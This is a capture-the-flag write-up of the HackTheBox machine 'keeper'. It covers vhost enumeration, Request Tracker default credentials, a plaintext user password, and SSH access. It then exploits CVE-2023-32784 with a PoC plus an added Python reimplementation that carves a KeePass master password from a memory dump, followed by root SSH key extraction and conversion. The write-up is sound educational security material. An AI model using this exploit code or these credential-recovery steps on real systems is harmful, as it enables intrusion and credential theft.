HTB: keeper Writeup

Machine Banner

Machine Information

Name: keeper
OS: Linux (Ubuntu)
Difficulty: Easy
Points: N/A
Release Date: N/A
Hostnames: keeper.htb / tickets.keeper.htb
Author: D3vnomi

Machine Rating

⭐⭐⭐☆☆ (6.0/10)

Difficulty Assessment:

  • Enumeration: ⭐⭐☆☆☆
  • Real-world: ⭐⭐⭐☆☆
  • CVE: ⭐⭐☆☆☆
  • CTF-like: ⭐⭐☆☆☆

Summary

keeper is an Easy-difficulty Linux machine about default credentials and secrets that outlive their purpose. A Request Tracker (RT) instance on a subdomain still accepts its shipped root:password administrator login; the initial password of a user sits in plaintext in that user's RT profile comments and still works for SSH; and the user's home directory holds a KeePass database together with a memory dump of the KeePass process. CVE-2023-32784 recovers the master password from that dump, the unlocked database contains root's SSH private key in PuTTY format, and converting the key to OpenSSH format gives a root shell.

TL;DR: Subdomain enumeration → RT default credentials → User credentials discovery → KeePass dump analysis → Root SSH key extraction → Root access.


Reconnaissance

Port Scanning

Terminal window
nmap -sC -sV -T4 -p- keeper.htb

Results:

22/tcp open ssh OpenSSH 8.9p1 (Ubuntu Linux; protocol 2.0)
80/tcp open http nginx 1.18.0 (Ubuntu)

The scan identified SSH and HTTP services. The HTTP service runs nginx, suggesting a web application is hosted.

Service Enumeration

Hostnames: keeper.htb, tickets.keeper.htb

Both hostnames were added to /etc/hosts. The site on keeper.htb is a single page that points visitors to tickets.keeper.htb/rt/ for IT support tickets; that subdomain hosts a Request Tracker (RT) installation.

Terminal window
curl http://tickets.keeper.htb

Request Tracker Login Page: The RT instance presents a login prompt. Testing default credentials reveals access with:

  • Username: root
  • Password: password

Vulnerability Assessment

Identified Vulnerabilities:

  • CVE-2023-32784 — KeePass 2.x before 2.54 leaves the master password (all but its first character) recoverable from a memory dump of the process
  • Default Credentials — Request Tracker still accepts its shipped root:password administrator login

Initial Foothold

Exploitation Path

Step 1: Identify Request Tracker Subdomain

Terminal window
feroxbuster -u http://keeper.htb -w /path/to/wordlist

feroxbuster brute-forces paths on one virtual host; it does not find other hostnames served from the same IP. Here the name tickets.keeper.htb comes from the link on the keeper.htb landing page. When no such hint exists, fuzz the Host header against the IP (ffuf with -H "Host: FUZZ.keeper.htb", or gobuster vhost) and filter out the catch-all response that every unknown name gets. The result either way is tickets.keeper.htb, running Request Tracker.
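Virtual-host discovery by response differencing, which is what a Host-header fuzz does under the hood, as an added Python example. This is my own illustration, not code from the writeup or from ffuf/gobuster; the IP 192.0.2.10 is a placeholder, and fake_fetch with its FAKE_VHOSTS table is constructed to mirror the layout the page describes (a catch-all default site on keeper.htb, RT answering on tickets.keeper.htb). http_fetch does the same thing against a live host.

```python
"""Added example (my code, not part of the original writeup or of ffuf/gobuster):
virtual-host discovery by comparing each candidate's response with the
catch-all response the server gives an unknown hostname."""
import http.client
import uuid
from typing import Callable, Dict, Iterable, List, Tuple

Response = Tuple[int, int]                  # (HTTP status, body length)
Fetcher = Callable[[str, str], Response]    # (ip, Host header) -> Response


def http_fetch(ip: str, host: str, port: int = 80, timeout: float = 5.0) -> Response:
    """Live fetcher: GET / on `ip` with an explicit Host header, without following
    redirects (a vhost answering 302 to /rt/ must stay distinguishable from a
    200 from the catch-all site)."""
    conn = http.client.HTTPConnection(ip, port, timeout=timeout)
    try:
        conn.request("GET", "/", headers={"Host": host})
        resp = conn.getresponse()
        return resp.status, len(resp.read())
    finally:
        conn.close()


# Constructed for this example; not measured on the real machine.
FAKE_VHOSTS: Dict[str, Response] = {
    "keeper.htb": (200, 149),          # default site, also served for unknown names
    "tickets.keeper.htb": (302, 0),    # Request Tracker redirects / to /rt/
}


def fake_fetch(ip: str, host: str) -> Response:
    """Offline stand-in for http_fetch: unknown names fall through to the default site."""
    return FAKE_VHOSTS.get(host, FAKE_VHOSTS["keeper.htb"])


def baseline(ip: str, domain: str, fetch: Fetcher) -> Response:
    """Ask for a name that cannot exist to learn what the catch-all vhost returns."""
    return fetch(ip, f"{uuid.uuid4().hex}.{domain}")


def find_vhosts(ip: str, domain: str, names: Iterable[str],
                fetch: Fetcher = http_fetch) -> List[Tuple[str, Response]]:
    """Return every candidate whose (status, size) differs from the catch-all baseline."""
    base = baseline(ip, domain, fetch)
    hits: List[Tuple[str, Response]] = []
    for name in names:
        host = f"{name}.{domain}"
        resp = fetch(ip, host)
        if resp != base:
            hits.append((host, resp))
    return hits


if __name__ == "__main__":
    # Placeholder IP; swap fake_fetch for http_fetch to run against a real target.
    for host, (status, size) in find_vhosts("192.0.2.10", "keeper.htb",
                                            ["www", "tickets", "mail", "dev"], fake_fetch):
        print(f"{host}: {status} ({size} bytes)")
```

The same comparison with ffuf is `ffuf -u http://192.0.2.10/ -H "Host: FUZZ.keeper.htb" -w subdomains.txt -fs 149`, where the value for -fs is the baseline size. Pages with dynamic content change size between requests, so on real targets compare on status plus word or line count (ffuf -fw, -fl) rather than exact byte length.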

Step 2: Default Credential Access

Navigating to http://tickets.keeper.htb presented an RT login page. Default credentials were successful:

Username: root
Password: password

Once authenticated, administrative access to the RT instance was granted.

Step 3: User Credential Discovery

In RT's user administration (http://tickets.keeper.htb/rt/Admin/Users/Modify.html?id=lnorgaard), the Comments field of the user lnorgaard holds an initial password in plaintext:

Welcome2023!

It is the kind of password set at provisioning with the expectation that the user changes it, and nobody did. User comments are readable by anyone with administrative access to RT, so the default login exposed it directly.

Step 4: SSH Access as User

Terminal window
ssh lnorgaard@keeper.htb
# Prompted for password
# Enter: Welcome2023!

Successful SSH login as lnorgaard granted initial user-level access to the system.


User Compromise

Credential Discovery

Initial compromise was achieved through discovered credentials in the Request Tracker system. The user lnorgaard had an initial password stored in RT’s user profile comments, likely from provisioning documentation:

Credentials:

  • Username: lnorgaard
  • Password: Welcome2023!

User Flag

Terminal window
cat ~/user.txt

🚩 User Flag: <REDACTED>

Post-Exploitation Enumeration

Upon SSH access as lnorgaard, enumeration of the home directory revealed interesting files:

Terminal window
ls -la ~

Key Discovery: A file named RT30000.zip sat in the home directory. It contains two files:

  • a KeePass 2 database (.kdbx)
  • a memory dump of the KeePass process (a Windows .dmp, evidently taken while the database was open)

Together they are exactly what CVE-2023-32784 needs: the dump can leak the master password, and the master password opens the database, which is where any privileged credentials would be kept. The archive was copied to the attacking host (scp) for analysis.


Privilege Escalation

KeePass Memory Dump Exploitation (CVE-2023-32784)

Step 1: Extract and Analyze KeePass Archive

Terminal window
cd ~/
unzip RT30000.zip

The archive contained:

  • KeePass.exe.dmp — Memory dump of KeePass process
  • passcodes.kdbx — KeePass database file

Step 2: Exploit Memory Dump with keepass-password-dumper

keepass-password-dumper is the public proof of concept for CVE-2023-32784. In KeePass 2.x before 2.54, the master-password box (SecureTextBoxEx) creates a new managed string for every keystroke after the first, of the form ●●●c (one bullet per character already typed, then the new character). These strings are never scrubbed, so a process dump, hibernation file or pagefile still contains them. The tool scans the dump for runs of the bullet character followed by one character and rebuilds the password position by position. The first character is lost by construction, and a position for which the dump holds several leftover strings is reported as a set of candidates. The tool is a .NET project, so it runs on the attacking host against the copied dump.

Terminal window
# Download and build keepass-password-dumper (vdohney's PoC for CVE-2023-32784)
git clone https://github.com/vdohney/keepass-password-dumper
cd keepass-password-dumper
dotnet build
# Run the PoC against the memory dump
dotnet run ../KeePass.exe.dmp

Output:

Found password: ●dgr●d med fl●de

Step 3: Identify Obscured Password

Each ● marks a position the dump did not settle. Two caveats apply to any CVE-2023-32784 recovery: the first character is never recoverable, because KeePass only leaks the text from the second keystroke onward, and positions with several candidates, or characters the terminal cannot render (here ø), also come out as bullets. What is left, dgr●d med fl●de with a missing head, reads as Danish, and the obvious completion is:

rødgrød med fløde

This is a traditional Danish dessert, a plausible password given the Danish-looking username lnorgaard. If guessing fails, the unknown positions are few enough to brute-force: generate candidates for the open positions and try them against the database (for example with keepass2john and john).
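The carving the PoC performs, written out as an added Python example to make the two caveats above concrete. This is my own simplified reimplementation, not the vdohney tool and not code from the writeup; the dump it scans is constructed by make_fake_dump (it simulates the leftover strings for the real password plus an abandoned partial entry "rod", so one position ends up with two candidates), and every function name here is mine.

```python
"""Added example (my code, not the keepass-password-dumper PoC and not from the
original writeup): a simplified reimplementation of the CVE-2023-32784 carving.

KeePass 2.x before 2.54 creates a new .NET string for every keystroke after the
first in the master-password box: "●ø", "●●d", "●●●g", ...  The bullet is U+25CF,
the byte pair CF 25 in UTF-16LE, so a run of CF 25 pairs followed by one UTF-16
code unit is a leaked keystroke and the run length is that character's position.
Position 0 is never leaked.
"""
import random
import re
from collections import defaultdict
from typing import Dict, Iterable, List, Set

BULLET = "\u25cf".encode("utf-16-le")                    # b"\xcf\x25"
LEFTOVER = re.compile(rb"(?:\xcf\x25)+(..)", re.DOTALL)  # bullets, then one code unit


def leftover_strings(typed: str) -> Iterable[bytes]:
    """The strings SecureTextBoxEx leaves in memory while `typed` is entered."""
    for i in range(1, len(typed)):
        yield BULLET * i + typed[i].encode("utf-16-le")


def make_fake_dump(attempts: List[str], seed: int = 7) -> bytes:
    """Constructed stand-in for a KeePass process dump (NOT the machine's dump):
    the leftover strings of every typed attempt, shuffled and separated by
    filler that cannot itself contain a bullet byte pair."""
    rnd = random.Random(seed)
    pieces = [s for attempt in attempts for s in leftover_strings(attempt)]
    rnd.shuffle(pieces)
    dump = bytearray()
    for piece in pieces:
        dump += b"\x00" * rnd.randint(1, 12) + b"System.String" + b"\x00" * rnd.randint(1, 4)
        dump += piece
    return bytes(dump)


def carve_candidates(dump: bytes) -> Dict[int, Set[str]]:
    """For each password position, every character that follows a bullet run of
    that length anywhere in the dump. More than one candidate at a position means
    the dump also held leftovers of other entries (or a random collision)."""
    cands: Dict[int, Set[str]] = defaultdict(set)
    for m in LEFTOVER.finditer(dump):
        position = (len(m.group(0)) - 2) // 2    # number of bullets == index of the char
        ch = m.group(1).decode("utf-16-le", errors="ignore")
        if ch and ch.isprintable():
            cands[position].add(ch)
    return dict(cands)


def render(cands: Dict[int, Set[str]]) -> str:
    """Assemble the result: ● for the unrecoverable first character (and for any
    position with no leftover), {a,b} where the dump offers several candidates."""
    if not cands:
        return ""
    out = ["\u25cf"]
    for i in range(1, max(cands) + 1):
        options = sorted(cands.get(i, ()))
        if len(options) == 1:
            out.append(options[0])
        elif not options:
            out.append("\u25cf")
        else:
            out.append("{" + ",".join(options) + "}")
    return "".join(out)


def recover(dump: bytes) -> str:
    return render(carve_candidates(dump))


if __name__ == "__main__":
    fake = make_fake_dump(["rod", "rødgrød med fløde"])
    print(recover(fake))    # ●{o,ø}dgrød med fløde
```

The output shows why the writeup's step of guessing the head of the password is unavoidable: the leading ● never resolves, and a position with a candidate set is only narrowed, not decided, by the dump. Against a real dump the same scan also picks up bullet runs from unrelated strings, which is where the longer candidate lists in the PoC's output come from.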

Step 4: Unlock KeePass Database

Terminal window
keepassx passcodes.kdbx
# Enter password: rødgrød med fløde

The database can equally be read from the command line with kpcli or keepassxc-cli. Once unlocked, it holds stored credentials, including an SSH private key for root in PuTTY format (a PuTTY-User-Key-File block), which was saved to root_key.ppk.

Step 5: Convert PuTTY Key to OpenSSH Format

OpenSSH does not read .ppk files, so the key is converted with puttygen (package putty-tools on Debian and Ubuntu). -O private-openssh selects the OpenSSH private-key format and -o names the output file; ssh refuses keys that are readable by others, hence the chmod.

Terminal window
puttygen root_key.ppk -O private-openssh -o root_key
chmod 600 root_key

ssh-keygen -y -f root_key prints the matching public key and is a quick check that the conversion produced a usable key before it is tried against the host.

Step 6: SSH as Root

Terminal window
ssh -i root_key root@keeper.htb

Successful authentication as root was achieved using the extracted and converted private key.

Root Flag

Terminal window
cat /root/root.txt

🚩 Root Flag: <REDACTED>


Attack Chain Summary

graph TD
A["Subdomain Enumeration<br/>tickets.keeper.htb"] --> B["Request Tracker Default<br/>Credentials root:password"]
B --> C["User Profile Enumeration<br/>lnorgaard Password Discovery"]
C --> D["SSH Access<br/>lnorgaard:Welcome2023!"]
D --> E["KeePass Archive Discovery<br/>RT30000.zip in Home Dir"]
E --> F["CVE-2023-32784 Exploitation<br/>keepass-password-dumper"]
F --> G["KeePass Master Password<br/>Identified: rødgrød med fløde"]
G --> H["KeePass Database Unlock<br/>Extract Root SSH Key"]
H --> I["SSH Key Format Conversion<br/>PuTTY to OpenSSH"]
I --> J["Root SSH Access<br/>Full System Compromise"]

Tools Used

Tool | Purpose
nmap | Port scanning and service enumeration
feroxbuster | Directory and content discovery on the web vhost
ssh | Shell access as lnorgaard and as root
scp | Copying RT30000.zip from the target to the attacking host
unzip | Archive extraction (RT30000.zip)
keepass-password-dumper | Master-password recovery from the memory dump (CVE-2023-32784)
dotnet | Building and running keepass-password-dumper
keepassx | Opening the unlocked KeePass database
puttygen | Converting the PuTTY .ppk key to OpenSSH format
curl | HTTP requests for service probing

Vulnerability Reference

# | Vulnerability | Component | Severity | Impact
1 | CVE-2023-32784 | KeePass 2.x before 2.54 | High | Master password recoverable from a process memory dump
2 | Default Credentials | Request Tracker | Critical | Unauthorized administrative access (root:password)
3 | Hardcoded Credentials | RT user profile | High | User password exposed in plaintext comments

Key Learnings

  1. Subdomain Enumeration is Critical — The Request Tracker instance lives on a separate virtual host and would have been missed by scanning keeper.htb alone. Read what the landing page links to, and fuzz the Host header against the same IP when it does not give the name away.

  2. Default Credentials Remain Prevalent — Despite being widely known, default credentials remain an effective entry point. Vendors and administrators must change every default password before deployment, and administrative interfaces such as RT's should not be reachable with the shipped account at all.

  3. In-Application Credential Storage is Dangerous — Storing credentials in user profile comments, tickets, or other application-visible locations creates information disclosure vulnerabilities.

  4. Memory Dumps Expose Sensitive Data — Process memory dumps can contain plaintext secrets. KeePass master passwords, encryption keys, and other sensitive material should never persist in memory longer than necessary.

  5. Process Dump Analysis is Effective — CVE-2023-32784 demonstrates how attackers can recover cryptographic material from memory dumps. Organizations should prevent unauthorized access to process memory and ensure secure memory handling in security-critical applications.

  6. SSH Key Format Conversion is Accessible — Credentials stored in one format (PuTTY .ppk) can be converted to standard formats (OpenSSH) using readily available tools, enabling exploitation.

  7. Information Disclosure Chains — This machine demonstrates how seemingly minor information disclosures (credentials in comments, backup files in home directories) create a chain of escalating access.


Author

D3vnomi


Disclaimer

This writeup is for educational purposes only. All activities described were performed in a controlled, legal environment (HackTheBox platform). Unauthorized access to computer systems is illegal.


Last Updated: 08 Mar 2026

Tags: #HackTheBox #Linux #Easy #CVE-2023-32784 #RequestTracker #KeePass #DefaultCredentials #MemoryDump